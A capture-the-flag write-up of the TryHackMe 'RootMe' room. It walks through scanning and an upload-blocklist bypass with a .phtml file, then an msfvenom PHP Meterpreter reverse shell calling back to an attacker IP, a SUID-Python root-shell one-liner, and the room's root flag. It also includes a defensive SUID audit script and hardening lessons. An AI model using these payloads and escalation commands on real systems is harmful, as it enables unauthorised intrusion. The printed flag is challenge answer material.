RootMe Writeup

Date: 19-03-2026 | Platform: TryHackMe | Difficulty: Easy

Overview

RootMe is an easy Linux room focused on insecure file upload exploitation and basic Linux privilege escalation. The attack path is straightforward: enumerate the web application, bypass the upload restriction with a PHP-parsed extension, gain code execution, and escalate via a misconfigured SUID Python binary.

Target Information

Target IP: 10.128.154.229 (the attacker host used for the reverse shell was 10.128.94.175).

Reconnaissance

Started with a full TCP scan to identify exposed services, then followed up with service detection on the relevant ports.

sudo nmap -sS -p- -T4 10.128.154.229 -vv
sudo nmap -sV -p 22,80 10.128.154.229

The scan revealed two open services: SSH on port 22 and HTTP on port 80, the two ports passed to the follow-up version scan.

Web Enumeration

With only HTTP exposed, the next step was content discovery. Directory brute-forcing quickly identified the upload functionality and the location where files were stored after upload.

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.128.154.229/FUZZ

Key findings:

Initial Access

The upload panel filtered on the file extension only, and only with a blocklist: files ending in .php were rejected, but Apache's PHP handler also executes .phtml, so renaming the payload was enough to bypass the restriction.

Payload Generation

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.128.94.175 LPORT=4444 -f raw > shell.phtml

Listener Setup

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.128.94.175
set LPORT 4444
exploit

Exploitation

With the handler listening, uploading shell.phtml through the form and then requesting it from the upload directory found during enumeration triggered the payload and resulted in a successful Meterpreter session on the target.

User Flag

After obtaining shell access, the user flag was located on the web server:

find / -type f -name user.txt 2>/dev/null
cat /var/www/user.txt

Note: The notes captured the location of the user flag but not the flag value itself.

Privilege Escalation

While enumerating the host, checking the current user's shell history exposed the exact escalation path used previously on the system.

cat .bash_history

The history contained two especially useful commands:

find / -perm /4000
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

To verify the room's intended path, a direct SUID search was also performed:

find / -perm -u=s -type f 2>/dev/null

The unusual binary was /usr/bin/python. On a normal system Python should never carry the SUID bit: it is a general-purpose interpreter, so a SUID-root copy lets any local user run arbitrary code as root, which made it an immediate privilege escalation vector.
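The defender-side check for this finding is a SUID audit that treats any setuid-root interpreter or shell as critical rather than just listing every SUID file. The script below is an added example, not part of the original notes or the room; INTERPRETER_NAMES and BASELINE are assumed, illustrative lists that must be tuned to the packages actually installed on the host.

```python
import os
import stat
from dataclasses import dataclass
from typing import List, Optional

# A setuid-root copy of any general-purpose interpreter or shell yields a
# root shell directly, exactly as /usr/bin/python did in the room.
INTERPRETER_NAMES = {"python", "perl", "ruby", "php", "node", "lua",
                     "sh", "bash", "dash", "zsh", "awk", "find", "vim", "vi"}

# Assumed baseline of SUID-root binaries that normally ship on Debian/Ubuntu
# (illustrative, not complete); anything outside it is reported for review.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
            "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
            "/usr/bin/newgrp", "/usr/bin/pkexec"}

@dataclass
class Finding:
    path: str
    reason: str  # "interpreter" (critical) or "unexpected" (needs review)

def classify(path: str, mode: int, uid: int) -> Optional[Finding]:
    # Only setuid-root regular files are in scope; None means nothing to report.
    if uid != 0 or not (mode & stat.S_ISUID):
        return None
    # Strip a version suffix so python2.7 / python3.8 still match "python".
    base = os.path.basename(path).rstrip("0123456789.")
    if base in INTERPRETER_NAMES:
        return Finding(path, "interpreter")
    if path not in BASELINE:
        return Finding(path, "unexpected")
    return None

def scan(root: str = "/") -> List[Finding]:
    """Walk the tree like `find / -perm -u=s -type f` and classify each file."""
    findings: List[Finding] = []
    skip = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, nothing to audit
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: the bit only matters on the real file
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                finding = classify(path, st.st_mode, st.st_uid)
                if finding is not None:
                    findings.append(finding)
    return findings
```

Run scan() as root so every directory is readable; an "interpreter" finding is the condition exploited in this room and should be fixed by clearing the bit with chmod u-s.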

Root Shell

After dropping from Meterpreter into a standard shell, the SUID Python binary was used to exec sh with -p, which tells the shell not to reset its effective UID to the real UID and so keeps the root privileges inherited from the SUID interpreter:

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

This returned a root shell immediately.

Root Flag

With root access confirmed, the final flag was retrieved from root's home directory.

whoami
cat /root/root.txt

Root Flag: THM{pr1v1l3g3_3sc4l4t10n}

Attack Chain Summary

- Port scan: SSH (22) and HTTP (80) exposed.
- Directory brute-force: upload form and upload storage directory found.
- Extension blocklist bypassed by uploading a PHP reverse shell as shell.phtml.
- Meterpreter session as the web server user; user flag read from /var/www/user.txt.
- .bash_history and a SUID search pointed to /usr/bin/python being SUID-root.
- python -c 'import os; os.execl("/bin/sh", "sh", "-p")' gave a root shell; root flag read from /root/root.txt.

Lessons Learned

- An extension blocklist does not stop uploads of server-side code: Apache executed .phtml even though .php was rejected. Validate uploads against an allowlist of expected types and store them where the web server will not execute scripts.
- Interpreters and shells must never be SUID-root; a single setuid Python binary turned web-server access into root. Audit SUID files regularly with the same find command used here and remove bits that are not justified.
- Shell history recorded the exact escalation path on the box. Review history files during an investigation, since they often document how a host was previously abused.

Tools Used

- nmap (port and service scan)
- ffuf (directory brute-force)
- msfvenom and msfconsole multi/handler (PHP Meterpreter payload and listener)
- find (flag location and SUID search)